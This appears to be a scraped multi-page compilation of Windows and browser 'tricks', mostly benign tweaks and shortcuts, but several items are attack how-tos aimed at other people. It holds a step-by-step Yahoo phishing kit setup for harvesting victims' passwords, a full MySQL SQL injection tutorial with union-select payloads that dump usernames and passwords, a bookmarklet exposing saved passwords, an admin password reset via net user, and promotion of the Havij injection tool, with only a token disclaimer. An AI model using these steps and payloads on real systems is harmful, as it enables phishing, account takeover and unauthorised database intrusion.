You are on page 1of 14

1.

Access Internet with Your MS Calculator


This trick will allow you to access internet through Calculator. Calculator can be used as a web browser. 1. Open your MS Calculator. This is normally found in Start>All Programs> Accessories>Calculator. 2. Open the help-window by pressing the F1 key. 3. Click the top-left corner icon of the help window once (Standard is a Document with a Question mark). 4. Select Go to URL-address. 5. Type your address into the available field, but remember to type http:// and not just www. (or equivalent).

2. Transform your Windows XP in to Windows 7 If you are using Windows XP and want to experience Windows 7 without installing then here is Seven Remix XP transformation pack to transform Windows XP to Windows 7. With this simple app you can make your XP look like Windows 7 in just few clicks. It supports Windows XP, Windows 2003, Windows Media Center Edition and some other flavors of XP. Will work with only 32 bit edition of Windows. Just download it and install. Download Seven Remix XP and transform your Windows XP 3. How To Create a Nameless Folder? Today I will discuss a trick that will allow you to create files and folders without any name. To perform the trick just follow the following steps: Step 1 : First of all select any file or folder whom you want to assign no name. Step 2 : Now right click on the file or folder and choose rename option.

Step 3 : Now the main part, press and hold the alt key and while holding the Alt key type numbers 0160 from the numpad. Here it is important to note that number 0160 should be typed from numpad and not from number keys present above character keys. Step 4 : Press Enter and the nameless file or folder will be created. The file or folder that seems nameless is actually named with a single space.
4.

Hacking admin or administrator account using net user command

Note: This will work only when user has access of user account or somehow he has been allowed or working in admin account. Steps to hack admin account: Step1: Go to the Start and click on Run and Type cmd and press enter ... Step 2: Now type "net user" in the command prompt to obtain the All accounts on that computer.. Step 3: Now select the account which u want to reset the password... Suppose that we want to reset the Password of Administrator... Now Type "net user Administrator * " Without quotes... and press Enter. Step 4: Now after that press Enter Twice to rest the password. Now Next time u open that Account. It will not require any Password

5.

View Passwords Under Asterisks Like ******


To view saved passwords behind asterisk, just open the web page having the password. After opening the web page paste the javascript given below in the address bar and hit enter. Thats it. Code javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();

6.

*** How To Fix Folder Option Missing Problem *** By VIPER


Hello Friends Today I am going to tell how get back the Folder Options. Most of times it happens that virus infects your system and folder options becomes missing. Today I am sharing with you "How to fix Folder Options Missing Problem".

Steps Involved 1. Go to the Start Menu and open the run. 2. In the Run Type "gpedit.msc" (Without quotes) and press enter.

3. Now Go to User Configuration>>Administrative Templates>>Windows Component>>Windows Explorer. 4. Click on Windows Explorer you will find the 3rd option on the right side of screen "Removes the Folder Option menu item from the Tools menu". 5. Just check it [MARK], if it is not configured then change it to enable by double clicking on it and after applying again set it to not configured. 6. I hope that you will find the option after restarting windows. That's the Overall Process of fixing the Folder Options Missing Problem....
7. 1). Start any application, say Word. Open some large documents. 2). Press CTRL+SHIFT+ESC to open Windows Task Manager and click Processes tab and sort the list in descending order on Mem Usage. You will notice that WINWORD.EXE will be somewhere at the top, using multiple MBs of memory. 3). Now switch to Word and simply minimize it. (Don't use the Minimize All Windows option of the task bar). 4). Now go back to the Windows Task Manager and see where WINWORD.EXE is listed. Most probably you will not find it at the top. You will typically have to scroll to the bottom of the list to find Word. Now check out the amount of RAM it is using. Surprised? The memory utilization has reduced by a huge amount. 5). Minimize each application that you are currently not working on by clicking on the Minimize button & you can increase the amount of available RAM by a substantial margin. Depending upon the number and type of applications you use together, the difference can be as much as 50 percent of extra RAM. In any multitasking system, minimizing an application means that it won't be utilized by the user right now. Therefore, the OS automatically makes the application use virtual memory & keeps bare minimum amounts of the code in physical RAM 8. STEP 1 : After the Copy Part is Over ... System is Rebooted as we all know In general Formatting Procedure... Now After Reboot the Below Image Will Appear.... STEP 2: Now As This Image APPEARS You Have to Press "Shift + F10". This will open the command Prompt... Now type task manager in it. This will open the task manager. STEP 3 : After The task Manager Opens go to Processes ... And Find "Setup.exe" process and Right CLICK on It.... and set the Priority to Highest....STEP 4: Now Just Watch the Set It will take around 9 minutes and 2 minutes for Tolerance(depends System to system).... Thats the Overall Tutorial...Hope You all Have LIKED IT...

So When you Format your PC Next Time It will Really Save Your TIME i.e, around 20 to 25 min

9. Best pc tips for fast process 1. Wallpapers : They slow your whole system down, so if you're willing to compromise, have a basic plain one instead! 2. Drivers: Update your hardware drivers as frequently as possible. New drivers tend to increase system speed especially in the case of graphics cards, their drivers are updated by the manufacturer very frequently! 3. Minimizing: If you want to use several programs at the same time then minimize those you are not using. This helps reduce the overload on RAM. 4. Boot Faster: The 'starting Windows 98/XP' message on startup can delay your booting for a couple of seconds. To get rid of this message go to c:\ and find the file Msdos.sys. Remove the Read-Only option. Next, open it in Notepad or any other text editor. Finally, go to the text 'Options' within the file and make the following changes: Add BootDelay=0. To make your booting even faster, set add Logo=0 to remove the Windows logo at startup. 5. Restart only Windows: When restarting your PC, hold down Shift to only restart Windows rather than the whole system which will only take a fraction of the time. 10. RENAME RECYCLE BIN TO WHAT YOU WANT!: 1. Start, Run, 'Regedit'. 2. Press 'Ctrl'+'F' to open find box and type 'Recycle Bin' to search. 3. Change any value data with 'Recycle Bin' to whatever name you want to give it ( ie, like 'Trash Can' or 'Dump' etc). 4. Press F3 to continue searching for 'Recycle Bin' and change wherever you come across 'Recycle Bin' to new its new name. 5. Repeat step 4 until you have finished with searching and changed all values to its new name. 6. Close regedit and hit F5 on desktop to see the new name on screen. Note: As a good practice, always backup your registry before changing anything although changing 'Recycle Bin' name is a simple tweak and doesnt affect anything else.

11. Improve Windows XP Shutdown Speed This tweak reduces the time XP waits before automatically closing any running programs when you give it the command to shutdown. Go to Start then select Run Type 'Regedit' and click ok Find 'HKEY_CURRENT_USER\Control Panel\Desktop\' Select 'WaitToKillAppTimeout' Right click and select 'Modify' Change the value to '1000' Click 'OK' Now select 'HungAppTimeout' Right click and select 'Modify' Change the value to '1000' Click 'OK' Now find 'HKEY_USERS\.DEFAULT\Control Panel\Desktop' Select 'WaitToKillAppTimeout' Right click and select 'Modify' Change the value to '1000' Click 'OK' Now find 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\' Select 'WaitToKillServiceTimeout' Right click and select 'Modify' Change the value to '1000' Click 'OK' 12. List of Windows Shortcuts CTRL+C (Copy) CTRL+X (Cut) CTRL+V (Paste) CTRL+Z (Undo) DELETE (Delete) SHIFT+DELETE (Delete the selected item permanently without placing the item in the Recycle Bin) CTRL while dragging an item (Copy the selected item) CTRL+SHIFT while dragging an item (Create a shortcut to the selected item) F2 key (Rename the selected item) CTRL+RIGHT ARROW (Move the insertion point to the beginning of the next word) CTRL+LEFT ARROW (Move the insertion point to the beginning of the previous word) CTRL+DOWN ARROW (Move the insertion point to the beginning of the next paragraph) CTRL+UP ARROW (Move the insertion point to the beginning of the previous paragraph) CTRL+SHIFT with any of the arrow keys (Highlight a block of text) SHIFT with any of the arrow keys (Select more than one item in a window or on the desktop, or select text in a document) CTRL+A (Select all) F3 key (Search for a file or a folder) ALT+ENTER (View the properties for the selected item) ALT+F4 (Close the active item, or quit the active program) ALT+ENTER (Display the properties of the selected object) ALT+SPACEBAR (Open the shortcut menu for the active window) CTRL+F4 (Close the active document in programs that enable you to have multiple

documents open simultaneously) ALT+TAB (Switch between the open items) ALT+ESC (Cycle through items in the order that they had been opened) F6 key (Cycle through the screen elements in a window or on the desktop) F4 key (Display the Address bar list in My Computer or Windows Explorer) SHIFT+F10 (Display the shortcut menu for the selected item) ALT+SPACEBAR (Display the System menu for the active window) CTRL+ESC (Display the Start menu) ALT+Underlined letter in a menu name (Display the corresponding menu) Underlined letter in a command name on an open menu (Perform the corresponding command) F10 key (Activate the menu bar in the active program) RIGHT ARROW (Open the next menu to the right, or open a submenu) LEFT ARROW (Open the next menu to the left, or close a submenu) F5 key (Update the active window) BACKSPACE (View the folder one level up in My Computer or Windows Explorer) ESC (Cancel the current task) SHIFT when you insert a CD-ROM into the CD-ROM drive (Prevent the CD-ROM from automatically playing) Dialog Box Keyboard Shortcuts CTRL+TAB (Move forward through the tabs) CTRL+SHIFT+TAB (Move backward through the tabs) TAB (Move forward through the options) SHIFT+TAB (Move backward through the options) ALT+Underlined letter (Perform the corresponding command or select the corresponding option) ENTER (Perform the command for the active option or button) SPACEBAR (Select or clear the check box if the active option is a check box) Arrow keys (Select a button if the active option is a group of option buttons) 13. Trick to lock your private folder Do you worry about privacy or do you maintain some personal files on the office system or at Friends pc, then you must lock that folder. I know many software's that most people use to lock their Personal files. But this trick is the safest and locks files or folders without use of any software's. Suppose you want to lock the folder movies in d: which has the path D:\movies. In the same drive create a text file and type ren movies movies.{21EC2020-3AEA-1069-A2DD-08002B30309D} Now save this text file as loc.bat Create another text file and type in it ren movies.{21EC2020-3AEA-

1069-A2DD-08002B30309D} movies Now save this text file as key.bat Now you can see 2 batch files loc and key. Press loc and the folder movies will change to control panel and you cannot view its contents. Press key and you will get back your original folder. try it out!!!!!!! Note: It is safe as in case if you loose the key file, you can create it again but the folder name must be correct 14. Check out these funny trick. Copy and paste the java script code to the address bar of your browser javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6

15. In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT Administrators are commonly used to lure the unsuspecting. Phishing is typically carried out by e-mail or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Even when using server authentication, it may require tremendous skill to detect that the website is fake. Read more for the Phishing Tutorial Now i am going to explain you How to do phishing? Steps are indicated as follows Step 1- Firstly you must signup for a free web hosting service like: www.freehostia.com www.ripway.com etc.. and register a domain or sub domain. After getting your signup done, you have your own subdomain like for instance you registered with freehostia, then your domain is like www.yourname.freehostia.com Step 2- Now Login to your freehostia account and go to File Manager in the freehostia control p an e l. Step 3- Now what you have to do is, go to your domain folder like yourname.freehostia.com and create a separate folder in that directory with the name of the site, for eg. yahoo , if you want to phish a yahoomail account! Step 4- Click here to Download the compressed file and extract it to your desktop:

and then open your yahoomail folder. Youll find two files there viz. bhanu.php & index.htm [ Each phisher folder contains same files] Step 5- Now upload bhanu.php & index.htm to the yahoo folder you created inside yourname.freehostia.com So when youre done with the uploading part, the link to your yahoo phisher is www.yourname.freehostia.com/yahoo/index.htm. Step 6- Congrats!! That is your Yahoomail phisher!! Now all you have to do is copy the link to the phisher file i.e.www.yourname.freehostia.com/yahoo/index.htm and send it to the victim you want to hack! When he/shell open that link, itll be directed to your yahoo phisher and when he/she logins that page he/shell be redirected to the original YahooMail website and youll get the password in the passes.txt file which will be created in tha yahoo folder you created in your freehostia domain and the path to that file will be www.yourname.freehostia.com/yahoo/passes.txt ! IMPORTANT NOTE: CHANGE YOUR FREEHOSTIA DIRECTORY PERMISSION TO 755 SO THAT NO ONE CAN ACCESS YOUR PERSONAL FILES EXCEPT THE PHISHER LOGIN PAGE!! **FOR EDUCATIONAL PURPOSES ONLY! 16. Trick To Make Your Firefox Fast This Firefox tricks will improve the speed & load time of firefox. And you will be able to surf faster. Type about:config in the address bar, Then look for the following entries, and make the corresponding changes. network.http.max-connections-per-server =32 network.http.max-persistent-connections-per-proxy =16 network.http.max-connections = 64 network.http.max-persistent-connections-per-server = 10

network.http.pipelining = true network.http.pipelining.maxrequests = 200 network.http.request.max-start-delay = 0 network.http.proxy.pipelining = true network.http.proxy.version = 1.0 Lastly right-click anywhere and select New- Integer. Name it nglayout.initialpaint.delay and set its value to 0. This value is the amount of time the browser waits before it acts on information it receives. Enjoy!! 17. Imagine 1 Rupee= 45 $ ?? Here is an old imagination.... but renewed now.. What will happens if ONE INDIAN RUPEE = FORTY-FIVE AMERICAN DOLLARS !!! There's tremendous improvement in the economy of India. India's exports increase, imports decrease. India becomes a super power as Economy is Power. That is this. Yes. From today on, "ONE INDIAN RUPEE = FORTY-FIVE AMERICAN DOLLARS" Imagine... from then, this may happen... SCENE 1 Venue : Microsoft Corporation, New York, US Some s/w engineers are seeing some photographs. s/w engg 1 : What's that? s/w engg 2 : Bob's photographs from India. s/w engg 1 : Wow. Let me see. Which is this place? s/w engg 3 : (Sees the photo) This is Ramanthapur, Hyderabad. s/w engg 1 : Fundoo yaar! And what is this? He's got an TVS 50 also. s/w engg 2 : Let me see (sees). Sexy yaar. This guy enjoys life man... s/w engg 3 : You know how much a TVS 50 costs? Nearly 200K. Say it in dollars... s/w engg 2: Oops. We can't dream of such a thing here. s/w engg 1 : Let's go to India & try for a job. [Everybody excited.] SCENE 2 Venue: Sun Microsystems, SanFrancisco, California, US s/w engg 1: I'm with you man. My Visa is expected anytime. Soon I will fly to India s/w engg 2 : Ohhh.... When is the party? s/w engg 1: When I get it on hand. s/w engg 2: Where will you be working? s/w engg 1 : I'll be working in Madhapur. s/w engg 2 : Oh! Madhapur. Great yaar. where it is... s/w engg 1 : It is in Hyderabad. s/w engg 3 : Fundoo place yaar. Nice climate Not like California. Youll love the weather yaar. One of my friends is in Jaipur,Rajasthan...He says it's the ultimate place to live in. Cool maan. s/w engg 2 : Who is the client yaar? s/w engg 1: You know Municipal Corporation of Hyderabad? s/w engg 3 : Yeah. MCH. One of my friends is there in the Road Cleaning Division. Most challenging job yaar. People are working in the cutting edge of technology there. s/w engg 1 : I'll be writing software for the accounts department of the GCU. s/w engg 2: GCU? what it means...? s/w engg 1 : that is Garbage Collecting Unit. s/w

engg 3 : : Great yaar. That's what I like about that country. You can get a job which requires all your skill. Not like here. See I'm writing software for the space shuttle remote control.I hate this. s/w engg 1 : Don't worry guys. I'll give you my Hotmail id. You can send your resume to me and I'll forward it to the HRD. [Everybody takes down his Hotmail id.] SCENE 3 Venue: IBM, New York, US (Conversation between a Male s/w engg. and Female s/w engg.) Male : Hi! Female: Hi. You know. I'm planning to settle in India soon. Male : What?? Female : Yeah. My marriage will be here in America only. He is doing his Ph.D in Miyapur College and he's coming here for a month. His study will be over in 2 months. He's already got a job in MEB (Miyapur Electricity Board). We planned to settle in Miyapur itself... I'm also planning to work there. Let's see... Male: Good luck... dont forget us & US... SCENE 4 Venue: Intel Corp. US s/w engg 1: Great news guys. Our George has got admission in the Nizam College in Hyd with scholarship for B.A History. A great new field yaar... All are excited... George : Got my Visa yesterday. It's all finalized now. s/w engg 2 : Congrats yaar. So you are out of this country. S/w engg 1 : B.A in Histroy...ohh...man, enjoy your life there? s/w engg 2 : : Got full aid, eh? George : Yeah. Got the UGC scholarship That will be 1200 Rupees per Year. s/w engg 1 : Great. Enjoy. s/w engg 2 : (Thinking loud): 1200 Indian Rupees...! that means 1200 * 45 = 54000 Dollars... with that amount I can buy a three bed-room flat & a Mercedes here 18. Hi all, This is for those who have to wait for about an hour after downloading certain amount of stuff from rapid share. To overcome this time constraint follow these steps: RAPID SHARE Method 1 1.open your rapid share link 2.then click on free. 3.As soon as timer start type this in address bar and click enter javascript:alert(c=0) 4.a pop up message will come click ok your counter is zero just download the stuff Method 2 1.Delete the cookies in your browser internet explorer or Firefox or opera or whatever u use). 2.Press start->run,type cmd. 3.In the command prompt,type ipconfig/flushdns press enter.Then type ipconfig/release,then ipconfig/renew .Now type exit. 4.Now try downloading, for many people this may work if their ISP provides a dynamic ip Method 3 1.Just switch off your router or modem) and switch it back on. 2.This may work for some users Mtnl and Bsnl) and maybe some others too. Actually these methods generally work for those people whose ISP gives them dynamic ip. If these don't work then one more thing that can be done is to use proxies. MEGA UPLOAD Mega upload is very easy to hack to solve the download slots problem). Just go to http://leech.megaleecher.net/ Here you will find a place to put your original link. Put it there press enter and then you will get a direct link within some seconds. You are done 19. Windows 7 is predominantly the best OS ever in the history of Microsoft. But, do you know that it has a GodMode within it ? There is a hidden GodMode feature that lets a user access all of the operating systems control panel features from within a single folder. To enter GodMode, one need to create a new folder and then rename the folder to the

following: GodMode.{ED7BA470-8E54-465E-825C-99712043E01C} Just try it..:) Found some more of Microsofts inbuilt godmode dev tools- http://news.cnet.com/8301-13860_310426627-56.html Append each of these after FolderName. {00C6D95F-329C-409a-81D7C46C66EA7F33} {0142e4d0-fb7a-11dc-ba4a-000ffe7ab428} {025A5937-A6BE-4686-A84436FE4BEC8B6D} {05d7b0f4-2121-4eff-bf6b-ed3f69b894d9} {1206F5F1-0569-412C-8FEC3204630DFB70} {15eae92e-f17a-4431-9f28-805e482dafd4} {17cd9488-1228-4b2f-88ce4298e93e0966} {1D2680C9-0E2A-469d-B787-065558BC7D43} {1FA9085F-25A2-489B-85D486326EEDCD87} {208D2C60-3AEA-1069-A2D7-08002B30309D} {20D04FE0-3AEA-1069-A2D808002B30309D} Example- Hacking.{ash23-ifsdf..u know now!} Now Go and GOD MODE YOURSELF

20. 1. Google trick to search different file formats (keyword filetype:doc) 2. Google trick to search educational resources (keyword site:.edu) example (computer site:.edu) 3. Finding the time of any location (time romania) 4. Finding the weather of any location (boston weather) 5. Tracking commentary of live events (Olympic games Beijing 2008) 6. Using Google as a calculator (9 * 10)(143+234)(119-8) 7. Converting currencies (1 USD in INR)(10 US Dollars in Indian Rupee) 8. Find how many teaspoons are in a quarter cup (quarter cup in teaspoons) 9. how many seconds there are in a year (seconds in a year) 10. Tracking stocks (stocks:MSFT) 11. Finding faces (add imgtype=face to the URL

21. Make Friends,Chat & Share Messages..Go to Your Dashboard 1.Restrict Folder Options using Registry Editor: 1. Start>Run>regedit 2. Navigate to HKEY_CURRENT_USER/Software/Microsoft/Windows/Curre ntVersion/Policies/Explorer 3. At right side double click on NoFolderOptions and set its value to 1. This is known as DWORD value. Thats it, you have now successfully disabled folder options in windows under Tools >Folder Options. Note: If due to some virus your folder option gets disabled, you can try the above steps to restore or enable folder options. You only need to set the NoFolderOptions value as 0 in this case. 2.Restrict Taskbar Properties: 1. Start>Run>regedit 2. Navigate to HKEY_CURRENT_USER/Software/Microsoft/Windows/Curre ntVersion/Policies/Explorer 3. At right side, Right Click>New>DWORD value. Name it NoSetTaskbar and set its value to 1. 3.Restrict Registry Editing Tools in windows: Using this tweak you can enable or disable your windows registry Editing tool. All you need to do is some changes in the windows registry below 1. Start>Run>regedit 2. Navigate to

HKEY_CURRENT_USER/Software/Microsoft/Windows/Curre ntVersion/Policies/System 3. At right side, Double Click on DisableRegistryTools and set its Value Data as 1. In the similar way you can even enable registry editing tools if its disabled by some virus program. 4.Disable or Restrict Task Manager in Windows OS: For your system security you can disable or Restrict other users from accessing Task Manger in windows. Follow the steps below to restrict task manager. 1. Start>Run>regedit 2. Navigate to HKEY_CURRENT_USER/Software/Microsoft/Windows/Curre ntVersion/Policies/System 3. At right side, Double Click on DisableTaskMgr and set its Value Data as 1. In the similar way you can even enable registry editing tools if its disabled by some virus program. If you know any such trick or registry tweak to provide restrictions using Registry editor please use the comments box below to add to this list 22. Learn How To Hack Websites , Mysql Injection Tutorial SQL Injection in MySQL Databases SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database. Step 1: When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this: www.site.com/page=1 or www.site.com/id=5 Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example: www.site.com/page=1' If the database is vulnerable, the page will spit out a MySQL error such as; Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29 If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection. Step 2 Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example: www.site.com/page=1 order by 1-- http://www.site.com/page=1 order by 2-- http://www.site.com/page=1 order by 3-- http://www.site.com/page=1 order by 4-- http://www.site.com/page=1 order by 5-If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of - after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used. Step 3 We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--, for example: www.site.com/page=1 union all select 1,2,3,4-- This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the

page. For example, 2 and 3. This means columns 2 and 3 are vulnerable. Step 4 We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands: user() database() version() or if these dont work try... @@user @@version @@database For example the url would look like: www.site.com/page=1 union all select 1,user(),version(),4-- The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83. IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this. Step 5 In this step our aim is to list all the table names in the database. To do this we enter the following command after the url. UNION SELECT 1,table_name,3,4 FROM information_schema.tables-- So the url would look like: www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables-- Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables. Step 6 In this Step we want to list all the column names in the database, to do this we use the following command: union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()-- So the url would look like this: www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()-- This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password. Step 7 Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command, union all select 1,2,group_concat(username,0x3a,password),4 from admin-- So the url would look like this: www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin-- Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the websit 23. Havij 1.13 Download Havij v1.13 From Here What Is Havij Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint,

retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system. The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injecting vulnerable targets using Havij. The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users. IN SHORT YOU CAN HACK ANY VULNERABLE TO SQLi WEBSITE! You Only Have To Enter Any Vulnerable Site Address in the Box & Click Analyze, You Will Get The Tables,DATABASE & ADMINISTRATOR LOGIN & PASSWORD ALSO! :) So Check Any Complete Tutorial On Google & Start Hacking Now! Download Havij v1.13 Fr 24.

You might also like